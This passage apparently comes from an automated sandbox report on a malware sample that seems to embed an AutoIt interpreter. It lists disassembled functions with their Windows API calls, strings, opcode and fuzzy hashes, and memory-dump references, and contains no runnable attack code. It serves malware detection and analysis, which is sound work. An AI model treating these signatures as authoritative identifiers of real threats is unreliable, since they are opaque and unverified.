                                                                                                                                                                      • Opcode Fuzzy Hash: 9c84483f705774f3494a49ccfd3ec0d7fbb5776a0a96d6f5ef8ad8e97034f1cd
                                                                                                                                                                      • Instruction Fuzzy Hash: F201EC30510704ABEB226B24DD4EFA677ACFF04B45F04166DE986E14E1DBA4A954CB90
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003713B0, Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • EndPath.GDI32(?), ref: 003713BF
                                                                                                                                                                      • StrokeAndFillPath.GDI32(?,?,003ABAD8,00000000,?), ref: 003713DB
                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 003713EE
                                                                                                                                                                      • DeleteObject.GDI32 ref: 00371401
                                                                                                                                                                      • StrokePath.GDI32(?), ref: 0037141C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2625713937-0
                                                                                                                                                                      • Opcode ID: 115535311e34843a5b5dc8f863c1c151c6c5ceb6a899f72a52f2d1a4c9c8c3e4
                                                                                                                                                                      • Instruction ID: 8d7da50b20555efea0d44dd2d9cb85dd26ea7255b7e24df0a5697c65c409169c
                                                                                                                                                                      • Opcode Fuzzy Hash: 115535311e34843a5b5dc8f863c1c151c6c5ceb6a899f72a52f2d1a4c9c8c3e4
                                                                                                                                                                      • Instruction Fuzzy Hash: 83F01D3100120AEFEB266F1AEC0C7683BB9AB05326F05D634E929440F1C7354595DF24
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003DC602, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 003DC69D
                                                                                                                                                                      • CoCreateInstance.OLE32(00402D6C,00000000,00000001,00402BDC,?), ref: 003DC6B5
                                                                                                                                                                        • Part of subcall function 00377F41: _memmove.LIBCMT ref: 00377F82
                                                                                                                                                                      • CoUninitialize.OLE32 ref: 003DC922
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                                                                      • String ID: .lnk
                                                                                                                                                                      • API String ID: 2683427295-24824748
                                                                                                                                                                      • Opcode ID: 4f0fca9322c6d2698f79fbefa4732f7cbcf3bb1c524cfe7f7eca5e6d7349cb33
                                                                                                                                                                      • Instruction ID: b229ed8b1746f45695b15cc606b0b828088325ce8081f8120f132161501f80a3
                                                                                                                                                                      • Opcode Fuzzy Hash: 4f0fca9322c6d2698f79fbefa4732f7cbcf3bb1c524cfe7f7eca5e6d7349cb33
                                                                                                                                                                      • Instruction Fuzzy Hash: EBA12D71118205AFD311EF54C891EABB7F8FF85304F008A6DF15A9B1A2DB74EA09CB52
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00382E5B, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00390FF6: std::exception::exception.LIBCMT ref: 0039102C
                                                                                                                                                                        • Part of subcall function 00390FF6: __CxxThrowException@8.LIBCMT ref: 00391041
                                                                                                                                                                        • Part of subcall function 00377F41: _memmove.LIBCMT ref: 00377F82
                                                                                                                                                                        • Part of subcall function 00377BB1: _memmove.LIBCMT ref: 00377C0B
                                                                                                                                                                      • __swprintf.LIBCMT ref: 0038302D
                                                                                                                                                                      Strings
                                                                                                                                                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00382EC6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                                                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                                                      • API String ID: 1943609520-557222456
                                                                                                                                                                      • Opcode ID: e73ba2bcd0d74f0bf617cbeef59f88bab35c08ab9d2254d362ee384cd216342e
                                                                                                                                                                      • Instruction ID: f21031c9102c06f8b369e20b3f7169013f8e6a7457a76bb66a59d2bf7178782d
                                                                                                                                                                      • Opcode Fuzzy Hash: e73ba2bcd0d74f0bf617cbeef59f88bab35c08ab9d2254d362ee384cd216342e
                                                                                                                                                                      • Instruction Fuzzy Hash: EC9180711083019FCB2AFF24D886D6EB7A8EF85750F00495DF5869B2A1DB34EE44CB52
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003DBBA6, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 003748AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003748A1,?,?,003737C0,?), ref: 003748CE
                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 003DBC26
                                                                                                                                                                      • CoCreateInstance.OLE32(00402D6C,00000000,00000001,00402BDC,?), ref: 003DBC3F
                                                                                                                                                                      • CoUninitialize.OLE32 ref: 003DBC5C
                                                                                                                                                                        • Part of subcall function 00379997: __itow.LIBCMT ref: 003799C2
                                                                                                                                                                        • Part of subcall function 00379997: __swprintf.LIBCMT ref: 00379A0C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                                                                      • String ID: .lnk
                                                                                                                                                                      • API String ID: 2126378814-24824748
                                                                                                                                                                      • Opcode ID: 96d120b9d4a83ff93b69c5579fe3246da7aebe83f94a256c8092936e44113742
                                                                                                                                                                      • Instruction ID: 28e937b3f341c7e03cacbb8b38d42c1ac9e993ec6050fe90cdc9511f7cd1361b
                                                                                                                                                                      • Opcode Fuzzy Hash: 96d120b9d4a83ff93b69c5579fe3246da7aebe83f94a256c8092936e44113742
                                                                                                                                                                      • Instruction Fuzzy Hash: C1A163756043019FCB12DF14C484E6ABBE9FF89324F15899AF8999B3A1CB31ED05CB91
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003CB7B6, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • OleSetContainedObject.OLE32(?,00000001), ref: 003CB981
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ContainedObject
                                                                                                                                                                      • String ID: AutoIt3GUI$Container$%@
                                                                                                                                                                      • API String ID: 3565006973-2227014086
                                                                                                                                                                      • Opcode ID: 10477a23cacf6b71685c1e5fcc6023c8b74636919da876d7dcad62d25dab61bc
                                                                                                                                                                      • Instruction ID: 14a7078e07b710746c6dbd853d5e7cf7db52dea25446a92d6c40bcf42f88418a
                                                                                                                                                                      • Opcode Fuzzy Hash: 10477a23cacf6b71685c1e5fcc6023c8b74636919da876d7dcad62d25dab61bc
                                                                                                                                                                      • Instruction Fuzzy Hash: 5A913774600601AFDB25DF28C885F6ABBE8FF48710F24856EE94ADB691DB70EC40CB50
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0039524D, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __startOneArgErrorHandling.LIBCMT ref: 003952DD
                                                                                                                                                                        • Part of subcall function 003A0340: __87except.LIBCMT ref: 003A037B
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorHandling__87except__start
                                                                                                                                                                      • String ID: pow
                                                                                                                                                                      • API String ID: 2905807303-2276729525
                                                                                                                                                                      • Opcode ID: 7ac024dec60d7bd013b96216155ad13163c18a183e72ea8f9ce5008fb53b755b
                                                                                                                                                                      • Instruction ID: 255515a4d3d2e7dfbadf10d94bb01bc4e11b541cc4d2567f8d842dae3b1baeeb
                                                                                                                                                                      • Opcode Fuzzy Hash: 7ac024dec60d7bd013b96216155ad13163c18a183e72ea8f9ce5008fb53b755b
                                                                                                                                                                      • Instruction Fuzzy Hash: EB519A21E0D60187DF1B7B25CA9137E2B94EB02350F618D68E4D5866E6EF74CCC49F46
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0039023B, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: #$+
                                                                                                                                                                      • API String ID: 0-2552117581
                                                                                                                                                                      • Opcode ID: bc23959584e70828fd978b863f267065215d39247599e64e20e2b5fcf2fd754e
                                                                                                                                                                      • Instruction ID: 98951568d4a82798125d4219c3636467b0bf6e3512bba35b8f88c394ab6127cf
                                                                                                                                                                      • Opcode Fuzzy Hash: bc23959584e70828fd978b863f267065215d39247599e64e20e2b5fcf2fd754e
                                                                                                                                                                      • Instruction Fuzzy Hash: 3D5101755043469FDF2BAF28C488BFA7BA4EF15310F594059EC92DB2A0D734AC82C761
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00383297, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memmove$_free
                                                                                                                                                                      • String ID: Oa8
                                                                                                                                                                      • API String ID: 2620147621-3496210839
                                                                                                                                                                      • Opcode ID: ee81e78fb091731ae994e245d59784c454f1c0b6b69dc694f0d210defb506afe
                                                                                                                                                                      • Instruction ID: 79fa0050ea6b979a2a5c0880483b75a99529d9ff2982c93114159ee4a3acd0ec
                                                                                                                                                                      • Opcode Fuzzy Hash: ee81e78fb091731ae994e245d59784c454f1c0b6b69dc694f0d210defb506afe
                                                                                                                                                                      • Instruction Fuzzy Hash: E5517A716083419FDB26DF28C481B6FBBE1EF85704F05486DE9898B351EB31DA01CB82
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003862F2, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$_memmove
                                                                                                                                                                      • String ID: ERCP
                                                                                                                                                                      • API String ID: 2532777613-1384759551
                                                                                                                                                                      • Opcode ID: 3740087c0ec44e3e7626b46c4b19050ecc4b457d77b73ea688f981f156a92590
                                                                                                                                                                      • Instruction ID: a594c086113391464288e6ba931414e2a25f29b5679e6307fb2b95d59ea0b4a7
                                                                                                                                                                      • Opcode Fuzzy Hash: 3740087c0ec44e3e7626b46c4b19050ecc4b457d77b73ea688f981f156a92590
                                                                                                                                                                      • Instruction Fuzzy Hash: 0551E571900309DFCB25DF55C882BAABBF8EF04310F2485AEE54ACB241E775D980CB40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003F7BB5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,003FF910,00000000,?,?,?,?), ref: 003F7C4E
                                                                                                                                                                      • GetWindowLongW.USER32 ref: 003F7C6B
                                                                                                                                                                      • SetWindowLongW.USER32 ref: 003F7C7B
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$Long
                                                                                                                                                                      • String ID: SysTreeView32
                                                                                                                                                                      • API String ID: 847901565-1698111956
                                                                                                                                                                      • Opcode ID: bbfd90c00d8723125cc8ebcac9bd4980d4c605573d90e83bf1c637473f89b397
                                                                                                                                                                      • Instruction ID: 698589aab83a0540d26b102c71871ce8d4e1286f9aaabd88aad5a45462cf8770
                                                                                                                                                                      • Opcode Fuzzy Hash: bbfd90c00d8723125cc8ebcac9bd4980d4c605573d90e83bf1c637473f89b397
                                                                                                                                                                      • Instruction Fuzzy Hash: 4F31A031204209AFDB229E38DC45BEA77A9EF45324F258725F979932E0C735E8519B50
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003F7648, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 003F76D0
                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 003F76E4
                                                                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 003F7708
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$Window
                                                                                                                                                                      • String ID: SysMonthCal32
                                                                                                                                                                      • API String ID: 2326795674-1439706946
                                                                                                                                                                      • Opcode ID: 892d7368fff1fbadaf11834cb9c9fbae487cd4819c50c1f8fdffe975b78edd60
                                                                                                                                                                      • Instruction ID: 60a3d1796d0193dfd35c6bdca7ef548b500a6aab245c67cc1f932ab6d826a905
                                                                                                                                                                      • Opcode Fuzzy Hash: 892d7368fff1fbadaf11834cb9c9fbae487cd4819c50c1f8fdffe975b78edd60
                                                                                                                                                                      • Instruction Fuzzy Hash: E821BF32610219BBDF228E64CC46FFA3B69EF48714F110214FE15AB1D0DAB5A850DBA0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003F6F1F, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 003F6FAA
                                                                                                                                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 003F6FBA
                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 003F6FDF
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$MoveWindow
                                                                                                                                                                      • String ID: Listbox
                                                                                                                                                                      • API String ID: 3315199576-2633736733
                                                                                                                                                                      • Opcode ID: 2c57486d075d42222d67e5079ea443f4c9f400e1a22ab84d8194f4568588ed07
                                                                                                                                                                      • Instruction ID: 28481de9ba7c3b9b6ea770e46a6318eb2c46fbb2a4154eb2a5c9678726db362e
                                                                                                                                                                      • Opcode Fuzzy Hash: 2c57486d075d42222d67e5079ea443f4c9f400e1a22ab84d8194f4568588ed07
                                                                                                                                                                      • Instruction Fuzzy Hash: D0216532610218BFDF129F54DC86FBB376EEF89754F528124FA149B190C671AC51CBA0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003F797D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 003F79E1
                                                                                                                                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 003F79F6
                                                                                                                                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 003F7A03
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                      • String ID: msctls_trackbar32
                                                                                                                                                                      • API String ID: 3850602802-1010561917
                                                                                                                                                                      • Opcode ID: 5317e7c74fa63352d0c35c5e7db6843f6c5b6a991fdb72374acc8cfb473c9e45
                                                                                                                                                                      • Instruction ID: 081668bb196d28de470a31968764cf9cd57770ae05b5928c1d4708d1bcee2731
                                                                                                                                                                      • Opcode Fuzzy Hash: 5317e7c74fa63352d0c35c5e7db6843f6c5b6a991fdb72374acc8cfb473c9e45
                                                                                                                                                                      • Instruction Fuzzy Hash: B111E372244208BAEF219F64CC05FAB7BADEF89764F124529FB41A6190D671A811CB60
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003EC304, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,003B1D88,?), ref: 003EC312
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 003EC324
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                                                      • API String ID: 2574300362-1816364905
                                                                                                                                                                      • Opcode ID: 1ee701477c94a1b57015903d713bcd0897b62e0d7a44bcf050db5a80609dd3b1
                                                                                                                                                                      • Instruction ID: 63704953c957f5ec9ab7516e4f71d8ca795dbbb624bd356ba5ca16835f060806
                                                                                                                                                                      • Opcode Fuzzy Hash: 1ee701477c94a1b57015903d713bcd0897b62e0d7a44bcf050db5a80609dd3b1
                                                                                                                                                                      • Instruction Fuzzy Hash: 12E08C78220323CFCB224F2AD804A9A76E8EF08305F808539E896C2290E778D841CA60
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00374C95, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00374C2E), ref: 00374CA3
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00374CB5
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                                      • API String ID: 2574300362-192647395
                                                                                                                                                                      • Opcode ID: b494806dace4eea59d4c291798c9fc7858dfbd5edd5c37176572b9583cb1f571
                                                                                                                                                                      • Instruction ID: 6221bd97dc190019170fe431066e174ae2106876b6ca45a0bc56ce2414e5bbb2
                                                                                                                                                                      • Opcode Fuzzy Hash: b494806dace4eea59d4c291798c9fc7858dfbd5edd5c37176572b9583cb1f571
